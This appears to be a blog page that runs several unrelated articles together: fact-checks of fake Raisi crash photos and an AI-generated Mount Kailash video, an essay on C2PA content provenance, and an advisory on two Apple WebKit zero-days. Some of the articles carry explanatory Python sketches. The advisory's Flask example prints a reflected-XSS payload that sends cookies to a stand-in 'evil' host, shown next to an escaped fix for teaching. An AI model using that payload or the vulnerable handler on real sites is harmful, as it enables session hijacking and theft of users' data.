#FactCheck - Viral Photos Falsely Linked to Iranian President Ebrahim Raisi's Helicopter Crash
Research Wing
Innovation and Research
PUBLISHED ON
Jun 6, 2024
Executive Summary:
On 20th May 2024, Iranian President Ebrahim Raisi and several others died in a helicopter crash in northwestern Iran. Images circulated on social media claiming to show the crash site are false. The CyberPeace Research Team's investigation revealed that these images actually show the wreckage of a training plane that crashed in Iran's Mazandaran province in 2019 or 2020. Reverse image searches and confirmation from the Tehran-based Rokna Press and Ten News verified that the viral images originated from an incident involving a police force's two-seater training plane, not the recent helicopter crash.
Claims:
The images circulating on social media claim to show the site of Iranian President Ebrahim Raisi's helicopter crash.
After receiving the posts, we reverse-searched each of the images and found links to a 2020 plane crash, except for the blue plane visible in one of the viral images. We found a website that had uploaded the viral plane crash images on April 22, 2020.
According to that website, a police training plane crashed in the forests of Mazandaran, near Swan Motel. We also found the images on another Iranian news outlet named 'Ten News'.
The photos uploaded to this second website were posted in May 2019. The news report reads, “A training plane that was flying from Bisheh Kolah to Tehran. The wreckage of the plane was found near Salman Shahr in the area of Qila Kala Abbas Abad.”
Hence, we conclude that the recent viral photos are not of Iranian President Ebrahim Raisi's helicopter crash; the claim is false and misleading.
Conclusion:
The images being shared on social media as evidence of the helicopter crash involving Iranian President Ebrahim Raisi are misattributed. They actually show the aftermath of a training plane crash that occurred in Mazandaran province in 2019 or 2020 (the exact year remains uncertain). This has been confirmed through reverse image searches that traced the images back to their original publication by Rokna Press and Ten News. Consequently, the claim that these images are from the site of President Ebrahim Raisi's helicopter crash is false and misleading.
Claim: Viral images of Iranian President Raisi's fatal chopper crash.
Claimed on: X (Formerly known as Twitter), YouTube, Instagram
Fact Check: False and Misleading
A viral video is circulating that claims to capture a breathtaking aerial view of Mount Kailash, apparently providing a rare real-life shot of Tibet's sacred mountain. We investigated its authenticity and analysed the footage for signs of digital manipulation.
CLAIMS:
The viral video claims to show real aerial footage of Mount Kailash, exposing viewers to the natural beauty of the hallowed mountain. The video was circulated widely on social media, with users crediting it as actual footage of Mount Kailash.
The viral video circulating on social media is not real footage of Mount Kailash. A reverse image search revealed that it is an AI-generated video created on Midjourney by Sonam and Namgyal, two Tibet-based graphic artists. Advanced digital techniques gave the video its realistic, lifelike appearance.
No media or geographical source has reported or published the video as authentic footage of Mount Kailash. Moreover, several visual aspects, including lighting and environmental features, indicate that it is computer-generated.
For further verification, we used Hive Moderation, a deepfake detection tool, to determine whether the video is AI-generated or real. It was found to be AI-generated.
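For readers who want to automate this kind of check, the sketch below shows how a detection service like Hive might be queried over HTTP. The endpoint URL, authorization scheme, and response fields are assumptions for illustration only; consult Hive's official API documentation for the actual values.

```python
# Hypothetical sketch: submitting media to an AI-content-detection API
# such as Hive's. The endpoint URL, auth header format, and response
# fields are ASSUMPTIONS for illustration, not Hive's documented API.
import requests

API_KEY = "YOUR_HIVE_API_KEY"                          # placeholder
ENDPOINT = "https://api.thehive.ai/api/v2/task/sync"   # assumed endpoint

def check_media(path: str) -> dict:
    """Submit a local image or video frame and return the raw JSON verdict."""
    with open(path, "rb") as f:
        resp = requests.post(
            ENDPOINT,
            headers={"Authorization": f"Token {API_KEY}"},  # assumed scheme
            files={"media": f},
        )
    resp.raise_for_status()
    return resp.json()

if __name__ == "__main__":
    # Inspect the returned class scores, e.g. an "ai_generated" label.
    print(check_media("kailash_frame.jpg"))
```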
CONCLUSION:
The viral video claiming to show an aerial view of Mount Kailash is an AI-manipulated creation, not authentic footage of the sacred mountain. This incident highlights the growing influence of AI and CGI in creating realistic but misleading content, emphasizing the need for viewers to verify such visuals through trusted sources before sharing.
Claim: Digitally Morphed Video of Mt. Kailash, Showcasing Stunning White Clouds
Claimed On: X (Formerly Known As Twitter), Instagram
Fact Check: AI-Generated (Checked using Hive Moderation).
With the rise of AI deepfakes and manipulated media, it has become difficult for the average internet user to know what to trust online. Synthetic media can have serious consequences, from virally spreading election disinformation and medical misinformation to revenge porn and financial fraud. Recently, a Pune man lost ₹43 lakh when he invested money based on a deepfake video of Infosys founder Narayana Murthy. In another case, that of 'Babydoll Archi', a woman from Assam had her likeness deepfaked by an ex-boyfriend to create revenge porn.
Image and video manipulation used to leave observable traces. Online sources may advise examining the edges of objects in an image, checking for inconsistent patterns and lighting differences, observing the lip movements of a speaker in a video, or counting the fingers on a person's hand. Unfortunately, as the technology improves, such folk advice might not always help users identify synthetic and manipulated media.
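One classical, scriptable version of these checks is Error Level Analysis (ELA), a JPEG forensic heuristic not named in this article but in the same spirit: edited regions often recompress differently from the rest of the image. The minimal sketch below assumes Pillow is installed; note that ELA is a heuristic, and modern AI-generated media frequently defeats it, which is precisely this article's point.

```python
# Minimal Error Level Analysis (ELA) sketch. Requires Pillow:
#   pip install pillow
from PIL import Image, ImageChops, ImageEnhance

def error_level_analysis(path: str, quality: int = 90) -> Image.Image:
    """Re-save the image at a known JPEG quality and amplify the residual."""
    original = Image.open(path).convert("RGB")
    original.save("_resaved.jpg", "JPEG", quality=quality)
    resaved = Image.open("_resaved.jpg")
    diff = ImageChops.difference(original, resaved)
    # Brighten the residual so compression inconsistencies become visible.
    return ImageEnhance.Brightness(diff).enhance(20)

if __name__ == "__main__":
    error_level_analysis("suspect.jpg").save("ela_result.png")
    # Roughly uniform noise suggests a single compression history; bright
    # patches can indicate spliced or re-edited regions. ELA is a heuristic,
    # not proof, and often fails on modern synthetic media.
```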
The Coalition for Content Provenance and Authenticity (C2PA)
One interesting project in the area of trust-building under these circumstances has been the Coalition for Content Provenance and Authenticity (C2PA). Launched in 2021, with Adobe and Microsoft among its founding members, C2PA is a collaboration between major players in AI, social media, journalism, and photography, among others. It set out to create a standard that lets publishers of digital media prove the authenticity of their media and track changes as they occur.
When photos and videos are captured, they generally store metadata such as the date and time of capture, the location, and the device used. C2PA developed a standard for sharing and checking the validity of this metadata, and for adding additional layers of metadata whenever a new user makes an edit. This creates a digital record of any and all changes made. Additionally, the original media is bundled with this metadata, making it easy to verify the source of the image and check whether the edits change the meaning or impact of the media. The standard allows different validation software, content publishers, and content creation tools to interoperate in maintaining and displaying proof of authenticity.
Source: C2PA website
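To make the mechanism concrete, here is a small conceptual sketch of a hash-chained edit history. This is not the real C2PA format (which uses signed JUMBF manifests and X.509 certificate chains); it only illustrates the core idea that each edit claim is cryptographically bound to the media bytes and to the previous claim, so tampering anywhere breaks verification.

```python
# Conceptual sketch of C2PA-style provenance (not the real C2PA format).
import hashlib
import json

def _digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def add_claim(chain: list, media: bytes, action: str, author: str) -> None:
    """Append a claim binding the current media bytes to the chain so far."""
    prev = chain[-1]["claim_hash"] if chain else ""
    claim = {"action": action, "author": author,
             "media_hash": _digest(media), "prev_claim_hash": prev}
    claim["claim_hash"] = _digest(json.dumps(claim, sort_keys=True).encode())
    chain.append(claim)

def verify(chain: list, media: bytes) -> bool:
    """Check every hash link and that the last claim matches the media."""
    prev = ""
    for claim in chain:
        body = {k: v for k, v in claim.items() if k != "claim_hash"}
        if claim["prev_claim_hash"] != prev:
            return False
        if _digest(json.dumps(body, sort_keys=True).encode()) != claim["claim_hash"]:
            return False
        prev = claim["claim_hash"]
    return bool(chain) and chain[-1]["media_hash"] == _digest(media)

if __name__ == "__main__":
    chain, photo = [], b"raw sensor bytes"
    add_claim(chain, photo, "captured", "camera-001")
    edited = photo + b" colour filter applied"
    add_claim(chain, edited, "edited: colour filter", "editor-app")
    print(verify(chain, edited))       # True: history is intact
    print(verify(chain, b"tampered"))  # False: media no longer matches
```

In the real standard, each claim is also digitally signed, so a verifier can check who made each change, not just that the chain is internally consistent.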
The standard is intended to be used on an opt-in basis and can be likened to a nutrition label for digital media. Importantly, it does not limit the creativity of fledgling photo editors or generative AI enthusiasts; it simply provides consumers with more information about the media they come across.
Could C2PA be Useful in an Indian Context?
The World Economic Forum’s Global Risks Report 2024 identifies India as a significant hotspot for misinformation. The recent AI Regulation report by MeitY indicates an interest in tools for watermarking AI-based synthetic content for ease of detecting and tracking harmful outcomes. Perhaps C2PA can be useful in this regard, as it takes a holistic approach to tracking media manipulation, even in cases where AI is not the medium.
Currently, 26 India-based organisations, such as the Times of India and Truefy AI, have signed up to the Content Authenticity Initiative (CAI), a community that contributes to the development and adoption of tools and standards like C2PA. However, people are increasingly using social media platforms like WhatsApp and Instagram as sources of information, both of which are owned by Meta and neither of which has yet implemented the standard in its products.
India also has low digital literacy rates and low resistance to misinformation. Part of the challenge would be teaching people how to read this nutrition label, empowering them to make better decisions online. As such, C2PA is just one part of an online trust-building strategy. It is crucial that education around digital literacy and policy around organisational adoption of the standard are also part of that strategy.
The standard is also not foolproof. Current iterations may still struggle when presented with screenshots of digital media and other non-technical digital manipulation. Linking media to their creator may also put journalists and whistleblowers at risk. Actual use in context will show us more about how to improve future versions of digital provenance tools, though these improvements are not guarantees of a safer internet.
The largest advantage of C2PA adoption would be the democratisation of fact-checking infrastructure. Since media is shared at a significantly faster rate than it can be verified by professionals, putting the verification tools in the hands of people makes the process a lot more scalable. It empowers citizen journalists and leaves a public trail for any media consumer to look into.
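As a sketch of what this consumer-side verification could look like, the snippet below uses the Content Authenticity Initiative's open-source c2pa-python SDK to read a file's manifest. The exact class and method names here are assumptions for illustration; check the SDK's documentation for the real API.

```python
# Hypothetical consumer-side provenance check. The c2pa-python SDK is real,
# but the constructor and method names below are ASSUMPTIONS; verify them
# against the SDK documentation before use.  pip install c2pa-python
import c2pa

def show_provenance(path: str) -> None:
    try:
        reader = c2pa.Reader.from_file(path)  # assumed constructor
        print(reader.json())                  # assumed: manifest as JSON
    except Exception as err:
        # No manifest, or a broken signature: treat the file's history as
        # unknown rather than as proven authentic.
        print(f"No verifiable provenance: {err}")

if __name__ == "__main__":
    show_provenance("downloaded_photo.jpg")
```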
Conclusion
From basic colour filters that make a scene more engaging, to removing a crowd from a social media post, to editing together videos of a politician to make it sound like they are singing a song, we have become accustomed to the media we consume being altered in some way. The C2PA is just one way to bring transparency to how media is altered. It is not a one-stop solution, but it is a viable starting point for creating a fairer, more democratic internet and increasing trust online. While there are risks to its adoption, it is promising to see organisations across different sectors collaborating on this project to be more transparent about the media we consume.
Apple has responded quickly to two severe zero-day vulnerabilities, CVE-2024-44308 and CVE-2024-44309, in iOS, macOS, visionOS, and Safari. These flaws, actively exploited in targeted attacks presumably mounted by state actors, allow for code execution and cross-site scripting (XSS). Reported by Google’s Threat Analysis Group, they illustrate how sophisticated modern attacks have become. Apple’s mitigations comprise improved memory handling and, especially, better state management to strengthen device security. Users are encouraged to update their devices as soon as possible, turn on automatic updates, and exercise caution online to avoid these new threats.
Introduction
Apple has demonstrated its commitment to security by releasing updates that fix two zero-day bugs actively exploited by hackers. The bugs, tracked as CVE-2024-44308 and CVE-2024-44309, are dangerous and can lead to code execution and cross-site scripting attacks. Because the vulnerabilities were already being exploited in the wild, quick patch releases were essential for user safety.
Vulnerabilities in Detail
The discovery of vulnerabilities (CVE-2024-44308, CVE-2024-44309) is credited to Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group (TAG). These vulnerabilities were found in JavaScriptCore and WebKit, integral components of Apple’s web rendering framework. The details of these vulnerabilities are mentioned below:
CVE-2024-44308
Severity: High (CVSS score: 8.8)
Description: A flaw in the JavaScriptCore component of WebKit. Malicious web content could cause arbitrary code to be executed on the target system, potentially giving the attacker full control.
Technical Finding: This vulnerability involves improper memory handling during JavaScript execution, allowing attackers to run injected payloads remotely.
CVE-2024-44309
Severity: Moderate (CVSS score: 6.1)
Description: A cookie-management flaw in WebKit that might result in cross-site scripting (XSS). This vulnerability enables attackers to inject unauthorized scripts into genuine websites, endangering users' privacy and identities.
Technical Finding: This issue arises from incorrect state-level cookie handling while processing maliciously crafted web content, providing an unauthorized route to session data.
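Apple has not published exploit details for these flaws, so the sketch below is a generic illustration of the XSS bug class rather than the actual WebKit vulnerability: a Flask endpoint that reflects user input into HTML verbatim, alongside the escaped fix. All names are illustrative.

```python
# Generic reflected-XSS illustration (NOT the actual WebKit/cookie flaw,
# whose details Apple has not disclosed). Requires Flask: pip install flask
from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)

@app.route("/vulnerable")
def vulnerable():
    # BAD: user input is reflected into HTML verbatim, so a crafted URL like
    # /vulnerable?name=<script>fetch('//evil/?c='+document.cookie)</script>
    # runs attacker script in the victim's session.
    name = request.args.get("name", "")
    return f"<h1>Hello {name}</h1>"

@app.route("/patched")
def patched():
    # GOOD: escaping neutralises HTML metacharacters before rendering.
    name = escape(request.args.get("name", ""))
    return f"<h1>Hello {name}</h1>"

if __name__ == "__main__":
    app.run()
```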
Affected Systems
These vulnerabilities impact a wide range of Apple devices and software versions:
iOS 18.1.1 and iPadOS 18.1.1: For devices including iPhone XS and later, iPad Pro (13-inch), and iPad mini 5th generation onwards.
iOS 17.7.2 and iPadOS 17.7.2: Supports earlier models such as iPad Pro (10.5-inch) and iPad Air 3rd generation.
macOS Sequoia 15.1.1: Specifically targets systems running macOS Sequoia.
visionOS 2.1.1: Exclusively for Apple Vision Pro.
Safari 18.1.1: For Macs running macOS Ventura and Sonoma.
Apple's Mitigation Approach
Apple has implemented the following fixes:
CVE-2024-44308: Enhanced input validation and robust memory checks to prevent arbitrary code execution.
CVE-2024-44309: Improved state management to eliminate cookie mismanagement vulnerabilities.
These measures ensure stronger protection against exploitation and bolster the underlying security architecture of affected components.
Broader Implications
The exploitation of these zero-days highlights the evolving nature of threat landscapes:
Increasing Sophistication: Attackers are refining techniques to target niche vulnerabilities, bypassing traditional defenses.
Spyware Concerns: These flaws align with the modus operandi of spyware tools, potentially impacting privacy and national security.
Call for Timely Updates: Users who delay updates inadvertently increase their risk exposure.
Technical Recommendations for Users
To mitigate potential risks:
Update Devices Promptly: Install the latest patches for iOS, macOS, visionOS, and Safari (a version-check sketch follows this list).
Enable Automatic Updates: Ensures timely application of future patches.
Restrict WebKit Access: Avoid visiting untrusted websites until updates are installed.
Monitor System Behavior: Look for anomalies that could indicate exploitation.
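On a Mac, the first two recommendations can be checked from a script. The sketch below uses only the Python standard library plus the `softwareupdate` command-line tool that ships with macOS; it assumes it is run on macOS (iPhone, iPad, and Vision Pro devices are updated through Settings instead).

```python
# Check the installed macOS version and list pending Apple updates.
# macOS only: relies on the built-in `softwareupdate` CLI.
import platform
import subprocess

def macos_version() -> str:
    """Return the macOS version string, e.g. '15.1.1'."""
    return platform.mac_ver()[0]

def pending_updates() -> str:
    """List available Apple software updates (may take a few seconds)."""
    result = subprocess.run(
        ["softwareupdate", "--list"], capture_output=True, text=True
    )
    return result.stdout or result.stderr

if __name__ == "__main__":
    print("macOS version:", macos_version())
    print(pending_updates())
    # To install everything available (admin rights required):
    #   sudo softwareupdate --install --all
```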
Conclusion
The exploitation of CVE-2024-44308 and CVE-2024-44309 against Apple devices highlights the importance of timely software updates in protecting users. Apple acted swiftly, shipping improved checks, better state management, and security patches. Users are therefore encouraged to install updates as soon as possible to guard against these zero-day flaws.